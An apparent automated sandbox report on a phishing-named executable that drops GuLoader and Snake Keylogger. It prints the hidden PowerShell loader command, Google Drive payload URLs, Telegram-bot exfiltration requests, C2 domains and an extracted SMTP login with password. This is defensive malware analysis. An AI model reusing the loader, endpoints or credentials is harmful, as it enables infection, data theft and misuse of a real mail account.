Edit tour

Windows Analysis Report
FACTURA DE PAGO.exe

Overview

General Information

Sample name:	FACTURA DE PAGO.exe
Analysis ID:	1538465
MD5:	de02502f79bc183714a9dfe879831170
SHA1:	c1fd975e0df663fd49e86ae1453d0ad3eccacea8
SHA256:	9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

FACTURA DE PAGO.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\FACTURA DE PAGO.exe" MD5: DE02502F79BC183714A9DFE879831170)

powershell.exe (PID: 7460 cmdline: "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7864 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "administration@south-fruits.com", "Password": "Rajahsouthfruits5", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.2931722428.000000002100A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1914582277.0000000008D6C000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 7864	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 7864	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 216.58.206.46, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7864, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7460, TargetFilename: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna\FACTURA DE PAGO.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)", CommandLine: "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FACTURA DE PAGO.exe", ParentImage: C:\Users\user\Desktop\FACTURA DE PAGO.exe, ParentProcessId: 7436, ParentProcessName: FACTURA DE PAGO.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)", ProcessId: 7460, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T11:16:54.926325+0200	2803305	3	Unknown Traffic	192.168.2.4	49740	188.114.97.3	443	TCP
2024-10-21T11:16:56.563306+0200	2803305	3	Unknown Traffic	192.168.2.4	49742	188.114.97.3	443	TCP
2024-10-21T11:16:58.201916+0200	2803305	3	Unknown Traffic	192.168.2.4	49744	188.114.97.3	443	TCP
2024-10-21T11:16:59.851756+0200	2803305	3	Unknown Traffic	192.168.2.4	49746	188.114.97.3	443	TCP
2024-10-21T11:17:01.461686+0200	2803305	3	Unknown Traffic	192.168.2.4	49748	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T11:16:52.929125+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	193.122.6.168	80	TCP
2024-10-21T11:16:54.210380+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	193.122.6.168	80	TCP
2024-10-21T11:16:55.835397+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49741	193.122.6.168	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T11:16:46.535494+0200	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	216.58.206.46	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "administration@south-fruits.com", "Password": "Rajahsouthfruits5", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: FACTURA DE PAGO.exe

Virustotal: Detection: 20%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 95.2% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: FACTURA DE PAGO.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2

Source: FACTURA DE PAGO.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1913479632.0000000008213000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bqm.Core.pdbP source: powershell.exe, 00000001.00000002.1906039371.0000000006F03000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mation.pdb source: powershell.exe, 00000001.00000002.1895923061.00000000008BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.1895923061.00000000008BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.1895923061.00000000008BF000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Code function: 0_2_00406033 FindFirstFileA,FindClose,	0_2_00406033
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004055D1
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 20EEF45Dh	4_2_20EEF2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 20EEF45Dh	4_2_20EEF4AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 20EEFC19h	4_2_20EEF974

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2021/10/2024%20/%2019:09:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2021/10/2024%20/%2019:09:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: msiexec.exe, 00000004.00000003.1980553089.0000000005441000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: *.google.com*.appengine.google.com*.bdn.dev*.origin-test.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.google.ca*.google.cl*.google.co.in*.google.co.jp*.google.co.uk*.google.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleapis.cn*.googlevideo.com*.gstatic.cn*.gstatic-cn.comgooglecnapps.cn*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgkecnapps.cn*.gkecnapps.cngoogledownloads.cn*.googledownloads.cnrecaptcha.net.cn*.recaptcha.net.cnrecaptcha-cn.net*.recaptcha-cn.netwidevine.cn*.widevine.cnampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.com*.google-analytics-cn.comgoogleadservices-cn.com*.googleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.goo equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 21 Oct 2024 09:17:07 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000001.00000002.1906039371.0000000006EA1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1906039371.0000000006F03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: FACTURA DE PAGO.exe, FACTURA DE PAGO.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: FACTURA DE PAGO.exe, FACTURA DE PAGO.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1896848086.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1896848086.0000000004A51000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000001.00000002.1896848086.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1896848086.0000000004A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20a
Source: msiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000004.00000002.2931722428.00000000210C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000004.00000002.2931722428.00000000210BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
